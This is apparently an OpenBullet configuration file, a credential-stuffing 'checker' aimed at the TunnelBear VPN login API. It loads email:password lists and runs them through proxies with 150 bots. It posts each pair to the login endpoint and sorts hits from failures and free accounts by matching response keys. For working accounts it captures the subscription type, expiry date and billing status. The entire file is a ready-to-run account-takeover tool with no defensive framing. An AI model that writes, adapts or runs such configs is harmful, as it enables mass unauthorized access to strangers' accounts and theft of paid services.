[SETTINGS]
{
  "Name": "TunnelBear VPN || Samoyed :)",
  "SuggestedBots": 150,
  "LastModified": "2019-05-27T20:51:38.0791303-07:00",
  "AdditionalInfo": "yeet",
  "Author": "Samoyed :)",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.tunnelbear.com/core/api/login" 
  CONTENT "username=<USER>&password=<PASS>&withUserDetails=true&v=web-1.0" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://www.tunnelbear.com" 
  HEADER "referer: https://www.tunnelbear.com/account/login" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "result" 
  KEYCHAIN Failure OR 
    KEY "Access denied" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "\"fullVersionUntil\":\"Jan 1, 2000 12:00:00 AM\"" 
    KEY "\"paymentStatus\":\"FREE\"" 
    KEY "\"fullVersion\":\"0\"" 
PARSE "<SOURCE>" LR "\"bearType\":\"" "\"" -> CAP "Subscription" 
PARSE "<SOURCE>" LR "\"fullVersionUntil\":\"" "\"" -> CAP "Subscription End" 
PARSE "<SOURCE>" LR "\"yearlyPurchase\":\"" "\"" -> CAP "Billed Yearly (0 is false, 1 is true)" 
